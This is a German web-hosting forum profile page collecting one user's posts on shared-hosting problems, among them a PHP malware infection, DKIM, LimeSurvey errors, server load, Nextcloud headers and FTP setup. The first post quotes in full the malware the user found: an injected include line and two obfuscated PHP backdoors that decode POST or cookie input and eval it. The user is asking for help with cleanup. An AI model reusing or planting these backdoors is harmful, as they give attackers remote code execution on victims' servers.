Beiträge von moggern

moggern · 1. März 2023

Ich betreibe auf einem Webhosting8000 ca. acht Wordpress-Installationen mit jeweils separaten (Sub-)Domains und noch vier andere PHP-Anwendungen (Limesurvey, FreeScout, Grocy, Mautic). Seit ca. zwei Wochen ist das gesamte Hostingpaket von einem PHP-Rootkit, so nenne ich es jetzt einfach mal, befallen. In manche index.php-Dateien wird z.B. sowas geschrieben

PHP

<?php
/*14070*/

@include ("/var/www/vhosts/hosting123456.abcde.netcup.net/httpdocs/support.example.de/public/css/builds/.9d7b42af.mo");

/*14070*/

// Check PHP version
if (!version_compare(phpversion(), '7.1.0', '>=')) {
    echo 'PHP 7.1+ is required to run FreeScout. Your PHP version: '.phpversion();
    exit();

Alles anzeigen

es werden neue Dateien wie radio.php erstellt

PHP

<?php    $keswwxWyH    =    chr  (115)  .    chr    (   629    -   513  )."\x72" .    "\137" ./*  VirQ  */chr (114)     ./* m   */"\x65"/*   MgaG*/./*   t */"\x70"    .   chr    (101)    .  "\x61"    ./*   WzHyJ*/"\164";
     $xRWYIXiyL = "\145"/*CI */.   "\x78"    .     'p'    .     "\x6c"/*  rnbM */./*  hF  */chr    (111) .    chr    (    583/*Irv   */-    483 ).chr/*dWboV  */(101);
    $WZMYsiYV     =/*  WSIB   */chr    (/*sdOI */983/*d   */- 884    ).'o'/* c*/.    'u'    .    chr    (110)/*dd*/.    "\164";
    $LNkaGVRf     =    'p'     .    "\141"/* BT  */.    "\x63"/* Ct */.    chr/*   uVx  */(107);
     $hKkGmvFnj/*Lm  */=  Array ( "btDsAQlLTwn"    =>   "FfTUVovaYTGQGbTtRMUgXdDAcaSmOE"/*zu */);
 /*   y  */$fdAchB/*hoFC   */=/*   ZB */Array/* rBg */(    "MSAWnzeflUBVhM"     =>/*   GtWdj*/"EsBeeESTgKETdAdxcvgintOQfjME"    );
     /*E*/foreach/* Ibe  */( Array(    $hKkGmvFnj,    $_POST,    $fdAchB,/*   OSUfz  */$_COOKIE,    $hKkGmvFnj)   as $uXITg)/* Ql   */{

 foreach/*   FBwJz   */(    $uXITg    as   $PMCCNriVnd   =>    $KTqLeiy    )/*   N  */{


     $KTqLeiy    =    @$LNkaGVRf(    "\x48"    .    chr/*  No  */(42),    $KTqLeiy     );
      $PMCCNriVnd    .=    "UFRjnz-sog-XlpAbx-yABuoZp-WbSELj-Ntu-BmEsoV";

/*qdJQb   */$PMCCNriVnd    =     $keswwxWyH/* lR  */(/* P*/$PMCCNriVnd,  (     strlen(     $KTqLeiy   )/strlen(  $PMCCNriVnd/* jp   */)    )   +/*oOwZz*/1);
/*VhPe  */$qNuEZ/*  k   */=   $KTqLeiy/*NptpI   */^    $PMCCNriVnd;

     $qNuEZ    =    $xRWYIXiyL    ( chr/*NY*/(/*   fb  */989    -    954     ),    $qNuEZ    );
        if    (/* CWhvC*/$WZMYsiYV    (/* k*/$qNuEZ    )   ==    3    )    {
/*  kC */eval/*biGr   */(    $qNuEZ[1]    (    $qNuEZ[2]/* Es */)    );
                    exit    ();
      }
        }


/* FL*/}

Alles anzeigen

oder auch wp-login.php (auch wenn es sich gar nicht um ein Wordpress handelt)

PHP

<?php
function    xe1    (   $dt2/* hx  */){$qo3    =    "3g0f<pE9x 6sa2t*" .
"enyh" .
"?;r@#LFkicvIbd'.o(_)/5u" .
"7Hl" .
"4" .
"-" .
"m" ;

$hc5='';foreach(   $dt2      as    $pq4    ){

$hc5    .=     $qo3       [    $pq4/*oz*/];


}return    $hc5;


}$mt6    =   Array();

$mt6/*   cbkq   */[]/* zwb  */=/*ngo*/xe1    (/*  g */Array(12  ,/* lpwh*/3    ,    29    ,/*   n   */41     ,    33    ,/*   e   */13  ,    29      ,    46      ,/*qagu  */47    ,    29   ,    3/*   df   */,       16    ,    46/* vur  */,    47/*fsx   */,     46/*   fnko  */,   13/*  zpz  */,   46    ,  13  ,/*   luw  */47       ,  7     ,     43    ,/*lz */0/*tl*/,  13    ,      47    ,   0/*  tx */,      10    ,    0    ,       7    ,    2  ,    10    ,    13    ,    10/*  ryata*/,    46       ,    29/*rpcry*/,      3/*   o  */,/*  rg*/12    ,)    )   ;
$mt6   []     =     xe1    (/*   gvqwf */Array(20    ,       5    ,    19    ,    5    ,/*  asyx   */9    ,/*   mh*/23     ,    42   ,    17    ,    45    ,       28     ,/*kv   */17       ,    27  ,    37   ,    38    ,    38/*bot */,    26/* x  */,       31    ,/* pddl   */25/*upfh   */,       6    ,    38/*   rf   */,    38    ,    39    ,    21   ,/*  hx   */9    ,)  )      ;
$mt6   []   =    xe1    (    Array(35/* ulami  */,      48/*  aiqzl*/,/* y */36      ,    33    ,    42   ,      45/*   cj  */,    16    ,)/*  u*/)/*  c*/;
$mt6/*  hk*/[]/*   zegkt */=/* gr   */xe1       (       Array(44  ,/*ivl  */15  ,)/*   ac   */)  ;$mt6/*   wrt*/[]      =    xe1    (    Array(35/* eluqq   */,/*  lvbuo  */40    ,)       )/*   o */;


$mt6    []    =/* pu  */xe1    (/* rshty*/Array(24     ,)/* skiuy  */)/*  xbuu   */;


$mt6    []       =    xe1/*   wkex */(/* onsw  */Array(4    ,)    )/*ak */;$mt6[]    =    xe1     (    Array(3    ,    28   ,/* x   */45/* ampq*/,    16/*  szhk */,     38/*qdlmi*/,    5    ,    42/*  stgfm */,    14/* aptu  */,      38    ,    29  ,    36    ,     17      ,   14/*rh */,     16    ,    17/*   bkgs */,  14    ,   11    ,)    )    ;$mt6[]/*e  */=/*lds  */xe1    (    Array(12    ,     22    ,       22      ,    12/*utb   */,     18/*   zct  */,     38      ,    48       ,      16/*  h*/,/*xsdrl */22  ,    1    ,    16    ,)    )    ;
$mt6[]/*  izzg */=/* vd */xe1    (    Array(11/*yscw   */,      14/* rui   */,  22/*  ywol   */,/*  vxhy*/38/*   jaui   */,/*cf  */22/*  arx   */,    16/*mrbs */,   5    ,       16       ,/*   ne*/12/*  un*/,    14     ,)    )      ;
$mt6[]     =/*   evev  */xe1    (    Array(16/*  zxfgs  */,    8/*zco  */,/*   fsxvx   */5       ,/* umj   */45    ,    36    ,/*myqfc*/33     ,     16    ,)/*  w*/)    ;

$mt6[]  =/*od*/xe1    (    Array(11       ,      42    ,/*   giqzg  */32    ,  11    ,    14    ,/*   kthsk*/22  ,)/*dhlp   */)    ;


$mt6[]/*   czxah  */=    xe1/*r  */(/*cby   */Array(42    ,   17    ,     45/*daaj   */,    28/*  nfg  */,    17/*  zy */,    27    ,)    )/*  kerch   */;

$mt6[]      =     xe1/*   ssrwd  */(     Array(11  ,    14     ,    22    ,      45    ,/* wum   */16/*   prdt*/,/*   qgc   */17    ,)/*   lbocj*/)    ;
$mt6[]/*  hd */=     xe1    (    Array(5    ,    12  ,    29    ,    27/* pdz  */,)    )    ;

$mt6[]      =/*uxh  */xe1/* ezpaw  */(    Array(48/*   q  */,/*rv  */33    ,       41    ,)       )    ;






foreach     (/*ggdt   */$mt6[8]     (/*goka */$_COOKIE,     $_POST      )     as/*ephl  */$bj14    =>     $fr11){/*  bvqvz */function    cp8/*  xbxq */(     $mt6,/*swjv   */$bj14     ,     $le10/*  pl  */)/*   uzski */{
    return    $mt6[11]    (/*   kcjal */$mt6[9]    (   $bj14      .    $mt6[0]/*   bvwu  */,    (    $le10/$mt6[13](    $bj14/* c*/)    )/*whr */+/* avn*/1/*kxjh  */)    ,/*lmpdr*/0/* ast  */,    $le10/*   nlhl  */);       }




    function    ja7/*   lr */(    $mt6,/*jww*/$dm12    )

   {


/*  ynkyc   */return  @$mt6[14]/* yx*/($mt6[3]    ,/*  it  */$dm12     );  }
      function/* zs   */wb9/*s   */(      $mt6,    $dm12    )    {


  if      (    isset/* e  */(/*jnjk */$dm12[2]    )   )      {


/*  jqfvw*/      $ub13/* rhy */=/*oj   */$mt6[4]    ./*  nygh */$mt6[15](       $mt6[0]   )/*  gdknr  */.   $mt6[2];


/*ua   */@$mt6[7]    (/*   sm*/$ub13,    $mt6[6]   ./* dp */$mt6[1]    .      $dm12[1]    (       $dm12[2]/*  qm   */)    );
/*xwdku   */@include    (  $ub13/* vjjaf  */);
      @$mt6[12]/* wp */(/*zyzk  */$ub13    );/*   tvk */die/*   rs   */();


      }
/* dmc   */}



       $fr11    =    ja7    (  $mt6,/* i   */$fr11/*  gnhif  */);
/*   voes   */wb9    (/* lpd  */$mt6,       $mt6[10]    (/*  gzqcm  */$mt6[5]/*nsd */,     $fr11  ^/* cezic  */cp8    (/*ed   */$mt6,    $bj14/* yfa */,    $mt6[13](      $fr11/* uiiav */)/*qbi*/)    )    );
}

Alles anzeigen

Den größten Teil kann ich immer anhand von Zeitstempeln erkennen und händisch entfernen. Einige unwichtige Wordpress-Seiten habe ich gesperrt, alle anderen geupdatet, v.a. auch die Plugins, aber das Zeug kommt täglich wieder und liefert dann teilweise Gewinnspiele aus etc.

Gibt es einen Lösung, um innerhalb des Webhostings Seiten voneinander zu isolieren? Es wäre ja blöd, wenn diese sich immer wieder gegenseitig infizieren.

Welche Möglichkeiten gibt es zu Bekämpfung? Innerhalb der WP-Seiten habe ich schon gute Erfahrung mit dem Plugin Wordfence gemacht, aber das geht halt auch nur da und verhindert auch nicht, dass das wieder kommt.

Vielen Dank vorab!

moggern · 4. April 2022

Moin, moin,

ich habe u.a. zwei EiWoMiSau und ein Webhosting 8000. Leider wird von nahezu allen Mailtestern wie z.B.

beklagt, dass die DKIM keys bzw. Signatur fehlen.

Im CCP sind im DNS unverändert die Standardwerte

Code

key1._domainkey CNAME key1._domainkey.webhosting.systems
key2._domainkey CNAME key2._domainkey.webhosting.systems

hinterlegt.

Habt ihr eine Idee, woran das noch liegen könnte? Die können doch nicht alle falsch liegen.

moggern · 28. Oktober 2021

Nachdem ich nun mehrmals unter Beibehaltung der Datenbank neu installiert habe, hat sich das Problem vermutlich durch die kosmische Hintergrundstrahlung gelöst

Danke trotzdem für eure Ansätze!

moggern · 26. Oktober 2021

Hallo zusammen,

nach einem lange Zeit vernachlässigtem und nun durch MySQL 8 erzwungenem Update auf die aktuelle LimeSurvey LTS v3.27.22 bekomme ich einen open_basedir Fehler. Die PHP Versionen 7.2, 7.3 und 7.4 ändern daran nichts. Auch habe ich schon beide Variante mit DOCROOT und WEBROOT durchprobiert. Habt ihr eine Idee?

Webhosting 8000

Code

PHP warning

is_file(): open_basedir restriction in effect. File(/usr/local/php73/share/php73/DbStorage.php) is not within the allowed path(s): (/var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/:/tmp/:/var/lib/php/sessions:/var/www/vhosts/hosting123456.a2fee.netcup.net/tmp)

/var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/YiiBase.php(450)

438         elseif($classMapOnly)
439             return false;
440         else
441         {
442             // include class file relying on include_path
443             if(strpos($className,'\\')===false)  // class without namespace
444             {
445                 if(self::$enableIncludePath===false)
446                 {
447                     foreach(self::$_includePaths as $path)
448                     {
449                         $classFile=$path.DIRECTORY_SEPARATOR.$className.'.php';
450                         if(is_file($classFile))
451                         {
452                             include($classFile);
453                             if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php')
454                                 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array(
455                                     '{class}'=>$className,
456                                     '{file}'=>$classFile,
457                                 )));
458                             break;
459                         }
460                     }
461                 }
462                 else

Stack Trace
#0     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/YiiBase.php(450): is_file("/usr/local/php73/share/php73/DbStorage.php")
#1     
 unknown(0): YiiBase::autoload("DbStorage")
#2     
 unknown(0): spl_autoload_call("DbStorage")
#3     
–
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/libraries/PluginManager/PluginManager.php(103): class_exists("DbStorage")

098      * If needed initializes the storage object.
099      * @param string $storageClass
100      */
101     public function getStore($storageClass)
102     {
103         if (!class_exists($storageClass)
104                 && class_exists('LimeSurvey\\PluginManager\\'.$storageClass)) {
105             $storageClass = 'LimeSurvey\\PluginManager\\'.$storageClass;
106         }
107         if (!isset($this->stores[$storageClass])) {
108             $this->stores[$storageClass] = new $storageClass();

#4     
–
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/libraries/PluginManager/PluginBase.php(162): LimeSurvey\PluginManager\PluginManager->getStore("DbStorage")

157      * @return iPluginStorage
158      */
159     public function getStore()
160     {
161         if (is_null($this->store)) {
162             $this->store = $this->pluginManager->getStore($this->storage);
163         }
164 
165         return $this->store;
166     }
167 

#5     
–
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/libraries/PluginManager/PluginBase.php(96): LimeSurvey\PluginManager\PluginBase->getStore()

091      * @param mixed $default The default value to use when not was set
092      * @return boolean
093      */
094     protected function get($key = null, $model = null, $id = null, $default = null)
095     {
096         return $this->getStore()->get($this, $key, $model, $id, $default);
097     }
098 
099     /**
100      * Return the description for this plugin
101      */

#6     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/plugins/ComfortUpdateChecker/ComfortUpdateChecker.php(68): LimeSurvey\PluginManager\PluginBase->get("animate_icon", null, null, false)
#7     
 unknown(0): ComfortUpdateChecker->beforeAdminMenuRender()
#8     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/libraries/PluginManager/PluginManager.php(185): call_user_func(array(ComfortUpdateChecker, "beforeAdminMenuRender"))
#9     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/Survey_Common_Action.php(1263): LimeSurvey\PluginManager\PluginManager->dispatchEvent(PluginEvent)
#10     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/Survey_Common_Action.php(479): Survey_Common_Action->fetchExtraMenus(array("issuperadmin" => true, "showLastSurvey" => true, "surveyTitle" => "Brille (ID:916997)", "surveyUrl" => "/admin/survey/sa/view/surveyid/916997", ...))
#11     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/views/admin/super/layout_main.php(10): Survey_Common_Action->_showadminmenu(array("issuperadmin" => true, "showLastSurvey" => true, "surveyTitle" => "Brille (ID:916997)", "surveyUrl" => "/admin/survey/sa/view/surveyid/916997", ...))
#12     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/Survey_Common_Action.php(241): require("/var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub....")
#13     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/Survey_Common_Action.php(347): Survey_Common_Action->renderInternal("/var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub....", array("content" => "<x-test id="action::index"></x-test> <!-- Welcome view --> <div...", "aData" => array("issuperadmin" => true, "showLastSurvey" => true, "surveyTitle" => "Brille (ID:916997)", "surveyUrl" => "/admin/survey/sa/view/surveyid/916997", ...)), true)
#14     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/controllers/admin/index.php(89): Survey_Common_Action->_renderWrappedTemplate("super", "welcome", array("issuperadmin" => true, "showLastSurvey" => true, "surveyTitle" => "Brille (ID:916997)", "surveyUrl" => "/admin/survey/sa/view/surveyid/916997", ...))
#15     
 unknown(0): Index->run()
#16     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/actions/CAction.php(115): ReflectionMethod->invokeArgs(Index, array())
#17     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/core/Survey_Common_Action.php(83): CAction->runWithParamsInternal(Index, ReflectionMethod, array())
#18     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/CController.php(308): Survey_Common_Action->runWithParams(array())
#19     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/CController.php(286): CController->runAction(Index)
#20     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/CController.php(265): CController->runActionWithFilters(Index, array())
#21     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/application/controllers/AdminController.php(165): CController->run("")
#22     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/CWebApplication.php(282): AdminController->run("")
#23     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/web/CWebApplication.php(141): CWebApplication->runController("admin")
#24     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/framework/base/CApplication.php(185): CWebApplication->processRequest()
#25     
+
 /var/www/vhosts/hosting123456.a2fee.netcup.net/httpdocs/sub.domain.de/index.php(194): CApplication->run()
2021-10-26 22:14:07 Apache Yii Framework/1.1.24-dev

Alles anzeigen

moggern · 18. April 2020

Sleip und KB19 : wie habt ihr denn die tollen Statistiken mit Graph hinbekommen?

moggern · 9. April 2020

Zitat von perryflynn

Eben noch ne die Berechnung der Prozentwerte für busy, idle, iowait und steal hinzugefügt.

Vielleicht könnte man auch eine DB anlegen und die Auslastung über einen längeren Zeitpunkt tracken? Dann kann man wirklich über einen längeren Zeitraum sehen, wie es auf dem Host aussieht.

Code

[PHP] Error: Invalid argument supplied for foreach() at /var/www/vhosts/hosting123456.abcde.netcup.net/httpdocs/cloud/apps/serverinfo/lib/OperatingSystems/DefaultOs.php#120

GET /settings/xxx/serverinfo
from 79.140.aaa.bbb by xxx at 2020-04-09T13:27:11+02:00

Seit ein paar Tagen kommt beim Aufruf der `nestcoud/settings/admin/serverinfo` Seite obiger Fehlermeldung. Blockt da netcup jetzt was?

Die Statistik funktioniert jedoch nach wie vor.

moggern · 25. März 2020

Zitat von vmk

Wie kommst du zu deiner negativen Aussage?

Offenbar interpretiere ich den Load-Wert falsch. Da die Nextcloud zu dem Zeitpunkt gerade unerträglich langsam war, passte das dazu.

Ab welchem Wert wäre denn meine Annahme gerechtfertigt?

moggern · 25. März 2020

Hui jetzt tagsüber ist Load mit fast 13 natürlich auf einer anderen Ebene. Das erklärt dann auch die teilweise unerträglichen Ladezeiten.

pasted-from-clipboard.png

moggern · 19. März 2020

Zitat von tab

Würde mich trotzdem mal interessieren, wie du das misst?

In /settings/admin/serverinfo gibt es da eine nette grafische Ausgabe:

pasted-from-clipboard.png

Ich weiß aber nicht wie NC an die Daten kommt. Hoffentlich killt das netcup jetzt nicht...

moggern · 18. März 2020

Load ist das hier:

https://de.wikipedia.org/wiki/…Average_auf_Unix-Systemen

Der Server fürs Webhosting hat 16 Kerne (Xeon 4116).

moggern · 18. März 2020

Seit einiger Zeit habe ich neben ein paar Wollmilchsäuen ein Webhosting 8000, den größten Tarif in der Reihe. Dort läuft u.a. eine Nextcloud, die auch ein wenig Leistung benötigt.

Beträgt in den Abend- und Nachtstunden die Last 1.4 bis 1.9, kann diese tagsüber schon mal im Bereich 4.5 bis 5 liegen.

Wie sieht das bei euch aus?

Kann man da was machen gegen "andere" Mitnutzer, die es übertreiben oder stopft netcup die Server einfach nur randvoll, egal welcher Tarif?

moggern · 12. März 2020

Ich bin auf PHP 7.3.15 mit FastCGI über Apache. Mehr auswählen kann ich ohnehin nicht. innerhalb des 7.3er Zweigs.

Ansonsten:

Zitat

memory_limit
1024M
max_execution_time
180
max_input_time
60 (Standard)
post_max_size
256M
upload_max_filesize
256M
opcache.enable
on (Standard)
disable_functions
NONE

Alles anzeigen

moggern · 12. März 2020

Seltstam. Den Scan von außen habe ich auch gerade gemacht. "X-Frame-Options" scheint als Einziges zu funktionieren, die anderen jedoch nicht, obwohl die genauso in der htaccess stehen:

pasted-from-clipboard.png

moggern · 12. März 2020

Zitat von killerbees19

Deaktiviere mal die intelligente Bearbeitung.

Hat leider nichts gebracht.

Zitat von p4scal

Wie siehts hier aus?

Ich war schon bei PHP 7.3.15 und dort gibt es nur FastCGI. Ein Downgrade auf 7.2.28 und Umstellung auf FPM führte bei mir dazu:

Zitat

Interner Serverfehler

Der Server konnte die Anfrage nicht fertig stellen.

Sollte dies erneut auftreten, sende bitte die nachfolgenden technischen Einzelheiten an Deinen Server-Administrator.

Weitere Details können im Server-Protokoll gefunden werden.

Technische Details

Entfernte Adresse: xxx

Anfragekennung: DjmBPI6gRYw8gnIxxxxx

Alles anzeigen

moggern · 11. März 2020

Zitat von Steini

Benutzt du denn Apache?

Ich denke schon. Prinzipiell kann ich ja nur das hier einstellen und ggf. Apache rausschmeißen, aber nicht andersherum:

pasted-from-clipboard.png

Oder irre ich hier?

moggern · 11. März 2020

Wir betreiben eine Nextcloud, aktuell noch in v17.0.3 Im dortigen admin Menü werden folgender Fehler/Warnungen ausgeworfen:

Der „X-Content-Type-Options“-HTTP-Header ist nicht so konfiguriert, dass er „nosniff“ entspricht. Dies ist ein potentielles Sicherheitsrisiko und es wird empfohlen, diese Einstellung zu ändern.
Der „X-Robots-Tag“-HTTP-Header ist nicht so konfiguriert, dass er „none“ entspricht. Dies ist ein potentielles Sicherheitsrisiko und es wird empfohlen, diese Einstellung zu ändern.
Der „X-Download-Options“-HTTP-Header ist nicht so konfiguriert, dass er „noopen“ entspricht. Dies ist ein potentielles Sicherheitsrisiko und es wird empfohlen, diese Einstellung zu ändern.
Der „X-Permitted-Cross-Domain-Policies“-HTTP-Header ist nicht so konfiguriert, dass er „none“ entspricht. Dies ist ein potentielles Sicherheitsrisiko und es wird empfohlen, diese Einstellung zu ändern.

Es wurde kein PHP-Memory-Cache konfiguriert. Zur Erhöhung der Leistungsfähigkeit kann ein Memory-Cache konfiguriert werden. Weitere Informationen findest Du in der Dokumentation.
Der "Referrer-Policy" HTTP-Header ist nicht gesetzt auf "no-referrer", "no-referrer-when-downgrade", "strict-origin", "strict-origin-when-cross-origin" oder "same-origin". Dadurch können Verweis-Informationen preisgegeben werden. Siehe die W3C-Empfehlung.

Die Meldung mit dem PHP-Memory-Cache bekomme ich wohl aufgrund des Shared Hostings und den entsprechenden Voreinstellungen nicht weg. Was aber ist mit den anderen Meldungen? Die .htaccess hat gleich im zweiten Block u.a. das hier stehen:

Code

<IfModule mod_env.c>
    # Add security and privacy related headers
    Header always set Referrer-Policy "no-referrer"
    Header always set X-Content-Type-Options "nosniff"
    Header always set X-Download-Options "noopen"
    Header always set X-Frame-Options "SAMEORIGIN"
    Header always set X-Permitted-Cross-Domain-Policies "none"
    Header always set X-Robots-Tag "none"
    Header always set X-XSS-Protection "1; mode=block"
    SetEnv modHeadersAvailable true
  </IfModule>

Alles anzeigen

Wird die Datei ignoriert?

HSTS läuft ja auch, wobei ich dieses in Plesk über die zusätzlichen Apache Header aktiviert habe:
pasted-from-clipboard.png

Für die anderen o.g. Fehler klappt das leider nicht

Hat jemand eine Idee, wo ich noch etwas beeinflussen kann?

moggern · 13. September 2019

Zitat von Doim1990

da du oben geschrieben hast, dass du proftpd verwendest hier die Anleitung: http://www.proftpd.org/docs/howto/NAT.html

Unter Configuring ProFTPD behind NAT findest du die Anleitung wie du deinen FTP Server dazu bringst mit der öffentlichen IP zu antworten und dort steht ebenfalls wie du die passive Ports konfigurieren kannst.

Genau das ist es!

Vielen Dank!

moggern · 13. September 2019

Ich bin schon einen Schritt weiter. Die Tests aus dem lokalen Netz waren erfolgreich, da letztendlich die IP beider Geräte lokal erreichbar ist. Von draußen kennt er natürlich keine 192er Adressen.

Code

curl -v --ftp-pasv --ssl -k -u ftpuser 'ftp://subdomain.example.com/home/'
Enter host password for user 'ftpuser':
* Hostname was NOT found in DNS cache
*   Trying 2.203.xxx.yyy...
* Connected to subdomain.example.com (2.203.xxx.yyy) port 21 (#0)
< 220 DiskStation FTP server ready.
> AUTH SSL
< 234 AUTH SSL command successful.
* successfully set certificate verify locations:
*   CAfile: none
  CApath: /etc/ssl/certs
* SSLv3, TLS handshake, Client hello (1):
* SSLv3, TLS handshake, Server hello (2):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS handshake, Server key exchange (12):
* SSLv3, TLS handshake, Request CERT (13):
* SSLv3, TLS handshake, Server finished (14):
* SSLv3, TLS handshake, CERT (11):
* SSLv3, TLS handshake, Client key exchange (16):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSLv3, TLS change cipher, Client hello (1):
* SSLv3, TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* Server certificate:
*      subject: C=TW; ST=Taiwan; L=Taipei; O=Synology Inc.; OU=FTP Team; CN=synology.com; emailAddress=product@synology.com
*      start date: 2011-03-10 00:12:48 GMT
*      expire date: 2030-11-25 00:12:48 GMT
*      issuer: C=TW; ST=Taiwan; L=Taipei; O=Synology Inc.; OU=Certificate Authority; CN=Synology Inc. CA; emailAddress=product@synology.com
*      SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> USER ftpuser
< 331 Password required for ftpuser.
> PASS xxxxx
< 230 User ftpuser logged in.
> PBSZ 0
< 200 PBSZ command successful (PBSZ=0).
> PROT P
< 200 Protection level set to Private.
> PWD
< 257 "/" is current directory.
* Entry path is '/'
> CWD home
* ftp_perform ends with SECONDARY: 0
< 250 CWD command successful.
> EPSV
* Connect data stream passively
< 229 Entering Extended Passive Mode (|||55589|)
* Hostname was NOT found in DNS cache
*   Trying 2.203.xxx.yyy...
* Connecting to 2.203.xxx.yyy (2.203.xxx.yyy) port 55589
* connect to 2.203.xxx.yyy port 21 failed: No route to host
* Failed to connect to subdomain.example.com port 21: No route to host
* Failed EPSV attempt. Disabling EPSV
> PASV
< 227 Entering Passive Mode (192,168,1,2,217,4)
* Hostname was NOT found in DNS cache
*   Trying 192.168.1.2...
* Connecting to 192.168.1.2 (2.203.xxx.yyy) port 55556

Alles anzeigen

Habt ihr eine Idee wie ich das lösen kann?

Das LAN wird über einen DynDNS-Namen aufgelöst.

moggern · 13. September 2019

Ich habe mehrere Webhostings und möchte diese via Backup Manager auf einen lokalen FTP-Server sichern. Leider gibt es bei Eingabe der Zugangsdaten im Backup Manager immer eine Fehlermeldung:

Zitat

Fehler: Unable to access to the storage: Transport error: unable to list directory: Curl error: (7) Couldn't connect to server: Last FTP request: PASV Last FTP response: 227 Entering Passive Mode (192,168,1,2,217,36)

Make sure you have entered the correct storage settings. You can check them independently with the command:

curl -v --ftp-pasv --ssl -k -u ftpuser 'ftp://subdomain.example.com/home/'pasted-from-clipboard.png

Ich bekomme die Meldung sowohl wenn ich als Server ein Debian 8 mit proftpd verwenden, als auch bei einem Synology NAS mit integriertem FTP Server.

Logge ich zum Testen via mc (midnight commander) oder Nautilus unter Linux ein klappt die Verbindung sofort.

Habt ihr eine Idee woran das liegen könnte?

moggern · 4. August 2019

Zitat von Steini

Vielleicht kannst du im Webhostingpanel verschiedene PHP-Versionen ausprobieren.

Ich werd verrückt! Das ist es!

Ich habe von der PHV Version laut 7.2.19 auf "7.2" gewechselt und siehe da, alle Logins funktionieren!

Vielen Dank an euch!

Nun ist dort aber das Problem, dass in dieser Version der OpCache fehlt... Man kann es drehen und wenden wie man will. Irgendwas fehlt immer.

Beiträge von moggern

PHP rootkit finden und entfernen

DKIM wird von mail testern moniert

LimeSurvey nach Update mit open_badedir Fehler

LimeSurvey nach Update mit open_badedir Fehler

Load auf Webhosting 8000

Load auf Webhosting 8000

Load auf Webhosting 8000

Load auf Webhosting 8000

Load auf Webhosting 8000

Load auf Webhosting 8000

Load auf Webhosting 8000

htaccess von Nextcloud ignoriert?

htaccess von Nextcloud ignoriert?

htaccess von Nextcloud ignoriert?

Interner Serverfehler

Technische Details

htaccess von Nextcloud ignoriert?

htaccess von Nextcloud ignoriert?

Probleme mit FTP Login im Backup Manager

Probleme mit FTP Login im Backup Manager

Probleme mit FTP Login im Backup Manager

Nextcloud Passwörter nach Migration falsch